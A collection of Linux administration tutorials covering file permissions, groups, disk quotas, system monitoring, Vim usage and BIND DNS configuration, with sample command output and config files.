The 'permissions' you give can be r=read, w=write, x=execute or 'space' for no permissions. Using a '+' grants the permission, and a '-' removes it.

As an example, the command 'chmodo+r Videos' will result in:

drwxr-xr-- 3 username  4096 2010-08-21 15:52 Videos

and now 'others' can read 'Videos'. Similarly, 'chmod o-r Videos', will set it back as it was, before the modification.

Linux file and folder permissions are covered extensively on our dedicated Linux File & Folder permissions article.

What Happens In A GUI environment?

If you are using a file manager like Nautilus, you will find a 'view' menu, which has an entry 'Visible Columns'. This opens up another window showing the visible columns that you can select to allow the file manager to show. You will find there are columns like 'Owner', 'Group' and 'Permissions'. By turning these columns ON, you can see the same information as with the 'ls -l' command.

If you want to modify the permissions of any file from Nautilus, you will have to right-click on the file with your mouse. This will open up a window through which you can access the 'properties' of the file. In the properties window, you can set or unset any of the permissions for owner, group and others.

What Are Group IDs?

Because Linux is a multi-user system, there could be several users logged in and using the system. The system needs to keep track of who is using what resources. This is primarily done by allocating identification numbers or IDs to all users and groups. To see the IDs, you may enter the command 'id', which will show you the user ID, the group ID and the IDs of the groups to which you belong.

A standard Linux installation, for example Ubuntu, comes with some groups preconfigured. Some of these are:

4(adm), 20(dialout), 21(fax), 24(cdrom), 26(tape), 29(audio), 30(dip), 44(video), 46(plugdev), 104(fuse), 106(scanner), 114(netdev), 116(lpadmin), 118(admin), 125(sambashare)

The numbers are the group IDs and their names are given inside brackets. Unless you are a member of a specific group, you are not allowed to use that resource. For example, unless you belong to the group 'cdrom', you will not be allowed to access the contents of any CDs and DVDs that are mounted on the system.

In Linux, the 'root' or 'super user', also called the 'administrator', is a user who is a member of all the groups and has all permissions in all places, unless specifically changed. Users who have been granted root privileges defined in the 'sudoers' file, can assume root status temporarily with the 'sudo' command.

  • Hits: 49120

Understanding Linux File System Quotas - Installation and Setup

When you are running your own web hosting, it is important to monitor how much space is being used by each user. This is not a simple task to be done manually since one of the users or group could fill up the whole hard disk, preventing others from availing any space. Therefore, it is important to allow each user or group their own hard disk space called quota and locking them out from using more than what is allotted.

The system administrator sets a limit or a disk quota to restrict certain aspects of the file system usage on a Linux operating system. In multi-user environments, disk quotas are very useful since a large number of users have access to the file system. They may be logging into the system directly or using their disk space remotely. They may also be accessing their files through NFS or through Samba. If several users host their websites on your web space, you need to implement the quota system.

How to Install Linux Quota

For installing a quota system, for example, in your Debian or RedHAT Linux system, you will need two tools called ‘quota’ and ‘quotatool’. At the time of installation of these tools, you will be asked if you wish to send daily reminders to users who are going over their quotas.

Now, the administrator also needs to know the users that are going over their quota. The system will send an email to this effect, therefore the email address of the administrator has to be inputted next.

In case the user does not know what to do if the system gives him a warning message, the next entry is the contact number of the administrator. This will be displayed to the user along with the warning message. With this, the quota system installation is completed.

At this time, a user and a group have to be created and proper permissions given. For creating, you have to assume root status, and type the following commands:

# touch /aquota.user /aquota.group
# chmod 600 /aquota.*

Next, these have to be mounted in the proper place on the root file system. For this, an entry has to be made in the ‘fstab’ file in the directory /etc. In the ‘fstab’ file, the root entry has to be modified with:

noatime,nodiratime,usrjquota=aquota.user,grpjquota=aquota.group,jqfmt=vfsv0

Next, the computer has to be rebooted, or the file system remounted with the command:

# mount -o remount /

 The system is now able to work with disk quotas. However, you have to allow the system to build/rebuild its table of current disk usage. For this, you must first run quotacheck.

This will examine all the quota-enabled file systems, and build a table of the current disk usage for each one. The operating system’s copy of the disk usage is then updated. In addition, this creates the disk quota files for the entire file system. If the quota already existed, they are updated. The command looks like:

# quotacheck -avugm

 Some explanation is necessary here. The (-a) tells the command that all locally mounted quota-enabled file systems are to be checked. The (-v) is to display the status information as the check proceeds. The (-u) is to enable checking the user disk quota information. The (-g) is to enable checking the group disk quota information. Finally, the (-m) tells the command not to try to remount file system read-only.

After checking and building the disk-quota files is over, the disk-quotas have to be turned on. This is done by the command ‘quotaon’ to inform the system that disk-quota should be enabled, such as:

# quotaon -avug

Here, (-a) forces all file systems in /etc/fstab to enable their quotas. The (-v) displays status information for each file system. The (-u) is for enabling the user quota. The (-g) enables the group quota.

Define Quota for Each User/Group

Now that the system is ready with quotas, you can start defining what each user or group gets as his limit. Two types of limits can be defined. One is the soft limit and the other is the hard limit. To set the two limits try editing the size and inode size with:

# edquota -u $USER

This allows you to edit the following line:

/dev/sda1   1024  200000  400000 1024 0    0

Here, the soft limit is 200000 (200MB) and the hard limit is 400000 (400MB). You may change it to suit your user (denoted by $USER).

The soft limit has a grace period of 7 days by default. It can be changed to days, hours, minutes, or seconds as desired by:

# edquota -t

This allows you to edit the line below. It has been modified to change the default to 15 minutes:

/dev/sda1                 15minutes                  7days


For editing group quota use:

# edquota -g $GROUP

Quota Status Report

Now that you have set a quota, it is easy to create a mini report on how much space a user has used. For this use the command:

root@gateway [~]# repquota  -a

*** Report for user quotas on device /dev/vzfs
Block grace time: 00:00; Inode grace time: 00:00
                            Block  limits                      File limits
User         used    soft    hard  grace    used  soft  hard  grace
---------------------------------------------------------------------
root        --  5578244       0       0     117864     0     0      
bin         --    30936       0       0        252     0     0      
mail        --       76       0       0         19     0     0      
nobody      --        0       0       0          3     0     0      
mailnull    --     3356       0       0        157     0     0      
smmsp       --        4       0       0          2     0     0      
named       --      860       0       0         11     0     0      
rpc         --        0       0       0         1      0     0      
mailman     --    40396       0       0       2292     0     0      
dovecot     --        4       0       0          1     0     0      
mysql       --   181912       0       0        857     0     0      
firewall    --    92023      153600 153600     21072   0     0      
#55         --     1984       0       0         74     0     0      
#200        --     1104       0       0         63     0     0      
#501        --     6480       0       0         429    0     0      
#506        --      648       0       0         80     0     0      
#1000       --     7724       0        0       878     0     0      
#50138      --    43044       0        0      3948     0     0

Once the user and group quotas are setup, it is simple to manage your storage. Therefore you do not allow users to hog all of the disk space. By using disk quotas, you force your users to be tidier, and users and groups of users will not fill their home directories with junk or old documents that are no longer needed.

  • Hits: 32441

Linux System Resource & Performance Monitoring

You may be a user at home, a user in a LAN (local area network), or a system administrator of a large network of computers. Alternatively, you may be maintaining a large number of servers with multiple hard drives. Whatever may be your function, monitoring your Linux system is of paramount importance to keep it running in top condition.

While monitoring a complex computer system, some of the basic things to be kept in mind are the utilization of the hard disk, memory or RAM, CPU, the running processes, and the network traffic. Analysis of the information made available during monitoring is necessary, since all the resources are limited. Reaching the limits or exceeding them on any of the resources could lead to severe consequences, which may even be catastrophic.

Monitoring The Hard Disk Space

Use a simple command like:

$ df -h

This results in the output:

Filesystem                Size          Used         Avail     Use%       Mounted on

/dev/sda1                 22G          5.0G          16G      24%         /

/dev/sda2                 34G           23G          9.1G     72%         /home

This shows there are two partitions (1 & 2) of the hard disk sda, which are currently at 24% and 72% utilization. The total size is shown in gigabytes (G). How much is used and balance available is shown as well. However, checking each hard disk to see the percentage used can be a big drag. It is better that the system checks the disks and informs you by email if there is a potential danger. Bash scripts may be written for this and run at specific times as a cron job.

For the GUI, there is a graphical tool called ‘Baobab’ for checking the disk usage. It shows how a disk is being used and displays the information in the form of either multicolored concentric rings or boxes.

Monitoring Memory Usage

RAM or memory is used to run the current application. Under Linux, there are a number of ways you can check the used memory space -- both in static and dynamic conditions.

For a static snapshot of the memory, use ‘free -m’ which results in the output:

$ free -m
                        total   used   free   shared   buffers  cached

Mem:                    1998    1896    101    0        59       605

-/+ buffers/cache:      1231    766

Swap:                   290     77         213

Here, the total amount of RAM is depicted in megabytes (MB), along with cache and swap. A somewhat more detailed output can be obtained by the command ‘vmstat’:

root@gateway [~]#  vmstat
procs   -----------memory-------- --- ---swap--  ----io----    --system--  -----cpu------
 r    b    swpd    free    buff  cache    si       so         bi    bo      in     cs    us  sy  id  wa  st
 1    0      0    767932    0      0      0        0          10     3      0     1      2   0   97   0   0
root@gateway [~]#

However, if a dynamic situation of what is happening to the memory is to be examined, you have to use ‘top’ or ‘htop’. Both will give you a picture of which process is using what amount of memory and the picture will be updated periodically. Both ‘top’ and ‘htop’ will also show the CPU utilization, tasks running and their PID. Whereas ‘top’ has a purely numerical display, ‘htop’ is somewhat more colorful and has a semi-graphic look. There is also a list of command menus at the bottom for set up and specific operations.

root@gateway [~]# top

top - 01:04:18 up 81 days, 11:05,  1 user,  load average: 0.08, 0.28, 0.33
Tasks:  47 total,   1 running,  45 sleeping,   0 stopped,   1 zombie
Cpu(s):  2.4%us,  0.4%sy,  0.0%ni, 96.7%id,  0.5%wa,  0.0%hi,  0.0%si,  0.0%st
Mem:    1048576k total,   261740k used,   786836k free,        0k buffers
Swap:         0k total,        0k used,        0k free,        0k cached

  PID    USER     PR   NI  VIRT  RES  SHR S  %CPU   %MEM    TIME+    COMMAND                                
    1   root      15   0  10372  736  624 S  0.0    0.1     1:41.86   init                                   
 5407   root      18   0  12424  756  544 S  0.0    0.1     0:13.71   dovecot                                
 5408   root      15   0  19068 1144  892 S  0.0    0.1     0:12.09   dovecot-auth                           
 5416   dovecot   15   0  38480 2868 2008 S  0.0    0.3     0:10.80   pop3-login                             
 5417   dovecot   15   0  38468 2880 2008 S  0.0    0.3     0:49.31   pop3-login                             
 5418   dovecot   16   0  38336 2700 2020 S  0.0    0.3     0:01.15   imap-login                             
 5419   dovecot   15   0  38484 2856 2020 S  0.0    0.3     0:04.69   imap-login                             
 9745   root      18   0  71548  22m 1400 S  0.0    2.2     0:01.39   lfd                                    
11501  root       15   0   160m  67m 2824 S  0.0    6.6     1:32.51   spamd                                  
23935  firewall   18   0  15276 1180  980 S  0.0    0.1     0:00.00   imap                                   
23948  mailnull   15   0  64292 3300 2620 S  0.0    0.3     0:05.62   exim                                   
23993  root       15   0   141m  49m 2760 S  0.0    4.8     1:00.87   spamd                                  
24477  root       18   0  37480 6464 1372 S  0.0    0.6     0:04.17   queueprocd                             
24494  root       18   0  44524 8028 2200 S  0.0    0.8     1:20.86   tailwatchd                             
24526  root       19   0  92984  14m 1820 S  0.0    1.4     0:00.00   cpdavd                                 
24536  root       33  18  23892 2556  680 S  0.0    0.2     0:02.09   cpanellogd                             
24543  root       18   0  87692  11m 1400 S  0.0    1.1     0:33.87   cpsrvd-ssl                             
25952  named      22   0   349m 8052 2076 S  0.0    0.8    20:17.42   named                                  
26374  root       15  -4  12788  752  440 S  0.0    0.1     0:00.00   udevd                                  
28031  root       17   0  48696 8232 2380 S  0.0    0.8     0:00.07   leechprotect                           
28038  root       18   0  71992 2172  132 S  0.0    0.2     0:00.00   httpd                                  
28524  root       18   0  90944 3304 2584 S  0.0    0.3     0:00.01   sshd

For a graphical display of how the memory is being utilized, the Gnome System Monitor gives a detailed picture. There are other system monitors available under various window managers in Linux.

Monitoring CPU(s)

You may have a single, a dual core, or a quad core CPU in your system. To see what each CPU is doing or how two CPUs are sharing the load, you have to use ‘top’ or ‘htop’. These command line applications show the percentage of each CPU being utilized. You can also see process statistics, memory utilization, uptime, load average, CPU status, process counts, and memory and swap space utilization statistics.

Similar output statistics may be seen by using command line tools such as the ‘mpstat’, which is part of a group package called ‘sysstat’. You may have to install ‘sysstat’ in your system, since it may not be installed by default. Once installed, you can monitor a variety of parameters, for example compare the CPU utilization of an SMP system or multi-processor system.

Finding out if any specific process is hogging the CPU needs a little more command line instruction such as:

$ ps -eo pcpu,pid,user,args | sort -r -k1 | less

OR

$ ps -eo pcpu,pid,user,args | sort -k 1 -r | head -10

Similar output can be obtained by using the command ‘iostat’ as root:

root@gateway [~]# iostat -xtc 5 3
Linux 2.6.18-028stab094.3 (gateway.firewall.cx)         01/11/2012

Time: 01:13:15 AM
avg-cpu:  %user   %nice   %system  %iowait  %steal   %idle
          2.38    0.01     0.43     0.46    0.00     96.72

Time: 01:13:20 AM
avg-cpu:  %user   %nice   %system  %iowait  %steal   %idle
          3.89    0.00     0.26     0.09     0.00     95.77

Time: 01:13:25 AM
avg-cpu:  %user   %nice   %system  %iowait  %steal   %idle
          0.31    0.00    0.15      1.07     0.00     98.47

This will show three outputs every five seconds and show the information since the last reboot.

CPU usage under GUI is very well depicted by the Gnome System Monitor and other system monitoring applications. These are also useful for monitoring remote servers. Detailed memory maps can be accessed, signals can be sent and processes controlled remotely.

linux-system-monitoring-1

Gnome-System-Monitor

Linux Processes

How do you know what processes are currently running in your Linux system? There are innumerable ways of getting to see this information. The handiest applications are the old faithfuls - ‘top’ and ‘htop’. They will give a real-time image of what is going on under the hood. However, if you prefer a more static view, use ‘ps’. To see all processes try ‘ps -A’ or ‘ps -e’:

root@gateway [~]# ps -e
PID TTY          TIME CMD
    1 ?          00:01:41 init
 3201 ?        00:00:00 leechprotect
 3208 ?        00:00:00 httpd
 3360 ?        00:00:00 httpd
 3490 ?        00:00:00 httpd
 3530 ?        00:00:00 httpd
 3532 ?        00:00:00 httpd
 3533 ?        00:00:00 httpd
 3535 ?        00:00:00 httpd
 3575 ?        00:00:00 httpd
 3576 ?        00:00:00 httpd
 3631 ?        00:00:00 imap
 3694 ?        00:00:00 httpd
 3705 ?        00:00:00 httpd
 3770 ?        00:00:00 imap
 3774 pts/0    00:00:00 ps
 5407 ?        00:00:13 dovecot
 5408 ?        00:00:12 dovecot-auth
 5416 ?        00:00:10 pop3-login
 5417 ?        00:00:49 pop3-login
 5418 ?        00:00:01 imap-login
 5419 ?        00:00:04 imap-login
 9745 ?        00:00:01 lfd
11501 ?        00:01:35 spamd
23948 ?        00:00:05 exim
23993 ?        00:01:00 spamd
24477 ?        00:00:04 queueprocd
24494 ?        00:01:20 tailwatchd
24526 ?        00:00:00 cpdavd
24536 ?        00:00:02 cpanellogd
24543 ?        00:00:33 cpsrvd-ssl
25952 ?        00:20:17 named
26374 ?        00:00:00 udevd
28524 ?        00:00:00 sshd
28531 pts/0    00:00:00 bash
29834 ?        00:00:00 sshd
30426 ?        00:11:27 syslogd
30429 ?        00:00:00 klogd
30473 ?        00:00:00 xinetd
30485 ?        00:00:00 mysqld_safe
30549 ?        1-15:07:28 mysqld
32158 ?        00:06:29 httpd
32166 ?        00:12:39 pure-ftpd
32168 ?        00:07:12 pure-authd
32181 ?        00:01:06 crond
32368 ?        00:00:00 saslauthd
32373 ?        00:00:00 saslauthd

PS is an extremely powerful and versatile command, and you can learn more by ‘ps --h’:

root@gateway [~]# ps --h
********* simple selection *********  ********* selection by list *********
-A all processes                         -C by command name
-N negate selection                      -G by real group ID (supports names)
-a all w/ tty except session leaders     -U by real user ID (supports names)
-d all except session leaders            -g by session OR by effective group name
-e all processes                         -p by process ID
T  all processes on this terminal        -s processes in the sessions given
a  all w/ tty, including other users     -t by tty
g  OBSOLETE -- DO NOT USE                -u by effective user ID (supports names)
r  only running processes                 U  processes for specified users
x  processes w/o controlling ttys         t  by tty
*********** output format **********  *********** long options ***********
-o,o user-defined   -f full               --Group --User --pid --cols --ppid
-j,j job control    s  signal             --group --user --sid --rows --info
-O,O preloaded     -o  v  virtual memory  --cumulative --format --deselect
-l,l long              u  user-oriented   --sort --tty --forest --version
-F   extra full        X  registers       --heading --no-heading --context
                    ********* misc options *********
-V,V  show version     L  list format codes   f  ASCII art forest
-m,m,-L,-T,H  threads  S  children in sum    -y change -l format
-M,Z  security data    c  true command name  -c scheduling class
-w,w  wide output      n  numeric WCHAN,UID  -H process hierarchy

  • Hits: 56688

Linux VIM / Vi Editor - Tutorial - Basic & Advanced Features

When you are using Vim, you want to know three things - getting in, moving about and getting out. Of course, while doing these three basic operations, you would like to do something meaningful as well. So, we start with getting into Vim.

Assuming that you are in a shell, or in the command line, you can simply type 'vim' and the application starts:

root@gateway [~]# vim

 Exiting the VIM application is easily accomplished: type ':' followed by a 'q', hit the 'Enter' key and you are out:

~
~                                         VIM - Vi IMproved
~
~                                          version 7.0.237
~                                     by Bram Moolenaar et al.
~                                 Modified by <This email address is being protected from spambots. You need JavaScript enabled to view it.>
~                            Vim is open source and freely distributable
~
~                                   Become a registered Vim user!
~                          type  :help register<Enter>   for information
~
~                          type  :q<Enter>               to exit        
~                          type  :help<Enter>  or  <F1>  for on-line help
~                          type  :help version7<Enter>   for version info
~
:q
root@gateway [~]#

 That's how you start and stop the Vim car. Now, let's try to learn how to steer the car.

You can move around in Vim, using the four arrow keys. However, a faster way is to use the 'h', 'j', 'k' and 'l' keys. This is because the keys are always under your right hand and you do not need to move your hand to access them as with the arrow keys. The 'j' moves the cursor down, 'k' moves it up. The 'h' key moves the cursor left, while 'l' moves it to the right. That's how you steer the Vim car.

You can edit a file using Vim. You either have an existing file, or you make a new one. If you start with 'vim filename', you edit the file represented by the 'filename'. If the file does not exist, Vim will create a new file. Now, if you want to edit a file from within Vim, open the file using ':e filename'. If this file is a new file, Vim will inform you. You can save the file using the ':w' command.

If you need to search the file you are editing for a specific word or string, simply type forward-slash '/' followed by the word you would like to search for. After hitting 'enter', VIM will automatically take you to the first match.  By typing forward-slash '/' again followed by 'enter' it will take you to the next match.

To write or edit something inside the file, you can start by typing ':i' and Vim will enter the 'Insert' mode. Once you have finished, you can exit the Insert mode by pressing the 'Esc' key, and undo the changes you made with ':e!'. You also have a choice to either save the file using the ':w' command, or save & quit by using ':wq'. Optionally, you can abort the changes and quit by ':q!'.

If you have made a change and want to quit without explicitly informing Vim whether you want to save the file or not, Vim will rightly complain, but will also guide you to use the '!'.

Command Summary

Start VIM:  vim
Quit Program: :q
Move Cursor: Arrow keys or j, k, h, l (down, up, left, right)
Edit file: vim filename
Open file (within VIM):  :e filename  e.g   :e bash.rc
Search within file: /'string'  e.g /firewall  
Insert mode:  :i
Save file:   :w
Save and Quit:  :wq
Abort and Quit:  :q!

Advanced Features of VIM

Now that you know your way in and out of Vim, and how to edit a file, let us dig a little deeper. For example, how can you add something at the end of a line, when you are at its starting point? Well, one way is to keep the right arrow pressed, until you get to the end. A faster way is 'Shift+a' and you are at the end of the line. To go to the beginning of the line, you must press 'Shift+i'. Make sure you are out of the 'Insert' mode shown at the bottom; use the 'Esc' for this.

Supposing you are in the middle of a line, and would like to start inserting text into a new line, just below it. One way would be to move the cursor right and hit 'Enter' when you reach the end. A faster way is to enter 'o'. If you enter 'o' or 'shift+o', you can start entering text into the new line created above the cursor. Don't forget to exit the 'Insert' mode by pressing 'Esc'.

How do you delete lines? Hold the 'delete' button and wait until the lines are gone. How can you do it faster? Use the 'd' command. If you want to delete 10 lines below your cursor position and the current line, try 'd10j'. To delete 5 lines above your current position and the current line, try 'd5k'. Note the 'j' and 'k' (down, up) covered in our previous section. If you’ve made a mistake, recover it with the undo command, 'u'. Redo it with 'Ctrl+r'.

Tip 1: To delete the current line alone, use 'dd'.

Tip 2: To delete the current line and the one below it, use 'd2d'.

Did you know you can have windows in Vim? Oh yes, you can. Try 'Ctrl+w+s' if you want a horizontal split, and 'Ctrl+w+v' if you want a vertical split. Move from one window to another by using 'Ctrl+w+w'. After you have finished traveling through all the windows, close them one by one using 'Ctrl+w+c'.

 Here is an example with four (4) windows within the Vim environment:

linux-vim-editor-1

You can record macros in Vim and run them. To record a macro you have to start it with an 'm'. To stop recording it, hit 'q'. To play the macro, press '@m'. To rerun it, press '@'. Macros are most useful when you require to perform the same commands within a file.

Vim also has extensive help facilities. To learn about a command, say 'e', type ':h e' and hit 'Enter'. You will see how the command 'e' can be useful. To come back to where you were, type ‘:q’ and then ‘Enter’. Incidentally, typing ':he' and 'Enter' will open up the general help section. Come back with the same ':q'.

As an example, here's what we got when we typed ':h e' (that's an ":" + "h" + space + "e"):

linux-vim-editor-2

When we typed ':he', we were presented with the main help file of VIM:

linux-vim-editor-3

Command Summary

Move cursor to end of line:  Shift+a
Move cursor to beginning of line:  Shift+o
Delete current line: dd
Delete 10 lines below cursor position: d10j
Delete 5 lines above cursor position: d5k
Undo:  u
Redo: Ctrl+r
Window Mode - Horizontal:  Ctrl+w+s
Window Mode - Vertical Split:  Ctrl+w+v
Move between windows: Ctrl+w+w
Close Window: Ctrl+w+c
Enable Macro recording:  m
Play Macro:  @m
Help:    :h 'command'  from within VIM. e.g  :h e



  • Hits: 58982

Linux BIND DNS - Part 6: Linux BIND - DNS Caching

In the previous articles, we spoke about the Internet Domain Hierarchy and explained how the ROOT servers are the DNS servers, which contain all the information about authoritative DNS servers the domains immediately below e.g firewall.cx, microsoft.com. In fact, when a request is passed to any of the ROOT DNS servers, they will redirect the client to the appropriate authoritative DNS server, that is, the DNS server in charge of the domain.

For example, if you're trying to resolve firewall.cx and your machine contacts a ROOT DNS server, the server will point your computer to the DNS server in charge of the .CX domain, which in turn will point your computer to the DNS server in charge of firewall.cx, currently server with IP 74.200.90.5.

Understanding DNS Caching and its Implications

As you can see, a simple DNS request can become quite a task in order to successfully resolve the domain. This also means that there's a fair bit of traffic generated in order to complete the procedure. Whether you're paying a flat rate to your ISP or your company has a permanent connection to the Internet, the truth is that someone ends up paying for all these DNS requests ! The above example was only for one computer trying to resolve one domain. Try to imagine a company that has 500 computers connected to the Internet or an ISP with 150,000 subscribers - Now you're starting to get the big picture!

All that traffic is going to end up on the Internet if something isn't done about it, not to mention who will be paying for it!

This is where DNS Caching comes in. If we're able to cache all these requests, then we don't need to ask the ROOT DNS or any other external DNS server as long as we are trying to resolve previously visited sites or domains, because our caching system would "remember" all the previous domains we visited (and therefore resolved) and would be able to give us the IP Address we're looking for!

Note: You should keep in mind that when you install BIND, by default it's setup to be a DNS Caching server, so all you need to do it startup the service, which is called 'named'.

Almost all Internet name servers use name caching to optimise search costs. Each of these servers maintains a cache which contains all recently used names as well as a record of where the mapping information for that name was obtained. When a client (e.g your computer) asks the server to resolve a domain, the server will first check to see whether it has authority (meaning if it is in charge) for that domain. If not, the server checks its cache to see if the domain is in there and it will find it if it's been recently resolved.

Assuming that the server does find it in the cache, it will take the information and pass it on to the client but also mark the information as a nonauthoritative binding, which means the server tells the client "Here is the information you required, but keep in mind, I am not in charge of this domain".

The information can be out of date and, if it is critical for the client that it does not receive such information, it will then try to contact the authoritative DNS server for the domain and obtain the up to date information it requires.

DNS Caching Does Come with its Problems!

As you can clearly see, DNS caching can save you a lot of money, but it comes with its problems !

Caching does work well in the domain name system because name to address binding changes infrequently. However, it does change. If the servers cached the information the first time it was requested and never change that information, the entries in the cache could become incorrect.

The Solution To DNS Caching Problems

Fortunately there is a solution that will prevent DNS servers from giving out incorrect information. To ensure that the information in the cache is correct, every DNS server will time each entry and dispose of the ones that have exceeded a reasonable time. When a DNS server is asked for the information after it has removed the entry from its cache, it must go back to the authoritative source and obtain it again.

Whenever an authoritative DNS server responds to a request, it includes a Time To Live (TTL) value in the response. This TTL value is set in the zone files as you've probably already seen in the previous pages.

If you manage DNS server an are planning to introduce changes like redelegate (move) your domain to some other hosting company or if the IP Address your website currently has or changing mail servers, in the next couple weeks, then it's a good idea to get your TTL changes to a very small value well before the scheduled changes. Reason for this is because any dns server that will query your domain, website or any resource record that belongs to your domain, will cache the data for the amount of time the TTL is set.

By decreasing the $TTL value to e.g 1 hour, this will ensure that all dns data from your domain will expire in the requesters cache 1 hour after it was received. If you didn't do this, then the servers and clients (simple home users) who access your site or domain, will cache the dns data for the currently set time, which is normaly around 3 days. Not a good thing when you make a big change :)

So keep in mind all the above when your about the perform a change in the DNS server zone files. a couple of days before making the change, decrease the $TTL value to a reasonable value, not more than a few hours, and then once you complete the change, be sure you set it back to what it was.

We hope this has given you an insight on how you can save yourself, or company money and problems which occur when changing field and values in the DNS zone files!

  • Hits: 25688

Linux BIND DNS - Part 5: Configure Secondary (Slave) DNS Server

Setting up a Secondary (or Slave) DNS sever is much easier than you might think. All the hard work is done when you setup the Master DNS server by creating your database zone files and configuring the named.conf file.

If you are wondering how is it that the Slave DNS server is easy to setup, well you need to remember that all the Slave DNS server does is update its database from the Master DNS server (zone transfer) so almost all the files we configure on the Master DNS server are copied to the Slave DNS server, which acts as a backup in case the Master DNS server fails.

Setting Up The Slave DNS Server

Let's have a closer look at the requirements for getting our Slave DNS server up and running.

Keeping in mind that the Slave DNS server is on another machine, we are assuming that you have downloaded and successfully installed the same BIND version on it. We need to copy 3 files from the Master DNS server, make some minor modifications to one file and launch our Slave DNS server.... the rest will happen automatically :)

So which files do we copy?

The files required are the following:

  • named.conf (our configuration file)
  • named.ca or db.cache (the root hints file, contains all root servers)
  • named.local (local loopback for the specific DNS server so it can direct traffic to itself)

The rest of the files, which are our db.DOMAIN (db.firewall.cx for our example) and db.in-addr.arpa (db.192.168.0 for our example), will be transferred automatically (zone transfer) as soon as the newly brought up Slave DNS server contacts the Master DNS server to check for any zone files.

How do I copy these files?

There are plenty of ways to copy the files between servers. The method you will use depends on where the servers are located. If, for example, they are right next to you, you can simply use a floppy disk to copy them or use ftp to transfer them.

If you're going to try to transfer them over a network, and especially over the Internet, then you might consider something more secure than ftp. We would recommend you use SCP, which stands for Secure Copy and uses SSH (Secure SHell).

SCP can be used independently of SSH as long as there is an SSH server on the other side. SCP will allow you to transfer files over an encrypted connection and therefore is preferred for sensitive files, plus you get to learn a new command :)

The command used is as follows: scp localfile-to-copy username@remotehost:desitnation-folder. Here is the command line we used from our Gateway server (Master DNS): scp /etc/named.conf root@voyager:/etc/

Keep in mind that the files we copy are placed in the same directory as on the Master DNS server. Once we have copied all three files we need to modify the named.conf file. To make things simple, we are going to show you the original file copied from the Master DNS and the modified version which now sits on the Slave DNS server.

The Master named.conf file is a clear cut/paste from the "Common BIND Files" page, whereas the Slave named.conf has been modifed to suit our Slave DNS server. To help you identify the changes, we have marked them in red:

Master named.conf file

options {
directory "/var/named";

};


// Root Servers
zone "." IN {
type hint;
file "named.ca";
};

// Entry for Firewall.cx - name to ip mapping
zone "firewall.cx" IN {
type master;
file "db.firewall.cx";
};


// Entry for firewall.cx - ip to name mapping
zone "0.168.192.in-addr.arpa" IN {
type master;
file "db.192.168.0";
};

// Entry for Local Loopback
zone "0.0.127.in-addr.arpa" IN {
type master;
file "named.local";
};

 

Slave named.conf file

options {
directory "/var/named";

};


// Root Servers
zone "." IN {
type hint;
file "named.ca";
};

// Entry for Firewall.cx - name to ip mapping
zone "firewall.cx" IN {
type slave;
file "bak.firewall.cx";
masters { 192.168.0.10 ; } ;
};

// Entry for firewall.cx - ip to name mapping
zone "0.168.192.in-addr.arpa" IN {
type slave;
file "bak.192.168.0";
masters { 192.168.0.10 ; } ;
};

// Entry for Local Loopback
zone "0.0.127.in-addr.arpa" IN {
type master;
file "named.local";
};

 As you can see, most of the slave's named.conf file is similair to the master's, except for a few fields and values, which we are going to explain right now.

The type value is now slave, and that's pretty logical since it tells the dns server if it's a master or slave.

The file "bak.firewall.cx"; entry basically tells the server what name to give the zone files once they are transfered from the master dns server. We tend to follow the bak.domain format because that's the way we see the slave server, a backup dns server. It is not imperative to use this name scheme, you can change it to whatever you wish. Once the server is up and running, you will see these files soon appear in the /var/named directory.

Lastly, the masters {192.168.0.10}; entry informs our slave server that this is the IP Address of the master DNS which it needs to contact and retrieve the zone files. That's all there is to setup the slave DNS server ! As we mentioned, once the master is setup, the slave is a peice of cake cause it involves very few changes.

Our Final article covers the setup of  Linux BIND DNS Caching.

  • Hits: 50696

Linux BIND DNS - Part 4: Common BIND Files - Named.local, named.conf, db.127.0.0 etc

So far we have covered in great detail the main files required for the firewall.cx domain. These files, which we named db.firewall.cx and db.192.168.0, define all the resouce records and hosts available in the firewall.cx domain.

We will be analysing these files in this article, to help you understand why they exist and how they fit into the big picture :

Our Common Files

There are 3 common files that we're going to look at, of which the first two files contents change slightly depending on the domain. This happens because they must be aware of the various hosts and the domain name for which they are created. The third file in the list below, is always the same amongst all DNS servers and we will explain more about it later on.

So here are our files:

  • named.local or db.127.0.0
  • named.conf
  • named.ca or db.cache

The Named.local File

The named.local file, or db.127.0.0 as some might call it, is used to cover the loopback network. Since no one was given the responsibility for the 127.0.0.0 network, we need this file to make sure there are no errors when the DNS server needs to direct traffic to itself (127.0.0.1 IP Address - Loopback).

When installing BIND, you will find this file in your caching example directory: /var/named/caching-example, so you can either create a new one or modify the existing one to meet your requirements.

The file is no different than our example db.addr file we saw previously:

$TTL 86400

0.0.127.in-addr.arpa. IN SOA voyager.firewall.cx. admin.firewall.cx. (

                1 ; Serial
                3h ; Refresh after 3 hours
                1h ; Retry after 1 hour
                1w ; Expire after 1 week
                1h ) ; Negative caching TTL of 1 hour

 

0.0.127.in-addr.arpa. IN NS voyager.firewall.cx.
0.0.127.in-addr.arpa. IN NS gateway.firewall.cx.
1.0.0.127.in-addr.arpa. IN PTR localhost.

That's all there is for named.local file !

The Named.ca File

The named.ca file (also known as the "root hints file") is created when you install BIND and dosen't need to be modified unless you have an old version of BIND or it's been a while since you installed BIND.

The purpose of this file is to let your DNS server know about the Internet ROOT Servers. There is no point displaying all of the file's content because it's quite big, so we will show an entry of a ROOT server to get the idea what it looks like:

; last update: Aug 22, 2011
; related version of root zone: 1997082200
; formerly NS.INTERNIC.NET

. 3600000 IN NS A.ROOT-SERVERS.NET.
A.ROOT-SERVERS.NET. 3600000 A 198.41.0.4
The domain name "." refers to the root zone and the value 3600000 is the explicit time to live (TTL) for the records in the file, but it is sometime ignored by DNS clients.

The rest of the entries are self explanatory. If you want to grab a new copy of the root hint file you can ftp to ftp.rs.internic.net (198.41.0.6) and log on anonymously, there you will find the latest up to date version.

The Named.conf File

The named.conf file is usually located in the /etc directory and is the key file that ties all the zone data files together and lets the DNS server know where they are located in the system. This file is automatically created during the installation but you must edit it in order to add new entries that will point to any new zone files you have created.

Let's have a close look at the named.conf file and explain:

options {
directory "/var/named";

};

// Root Servers
zone "." IN {
type hint;
file "named.ca";
};

// Entry for Firewall.cx - name to ip mapping
zone "firewall.cx" IN {
type master;
file "db.firewall.cx";
};

// Entry for Firewall.cx - ip to name mapping
zone "0.168.192.in-addr.arpa" IN {
type master;
file "db.192.168.0";
};

// Entry for Local Loopback
zone "0.0.127.in-addr.arpa" IN {
type master;
file "named.local";
};

At first glance it might seem a maze, but it's a lot simpler than you think. Break down each paragraph and you can see clearly the pattern that follows.

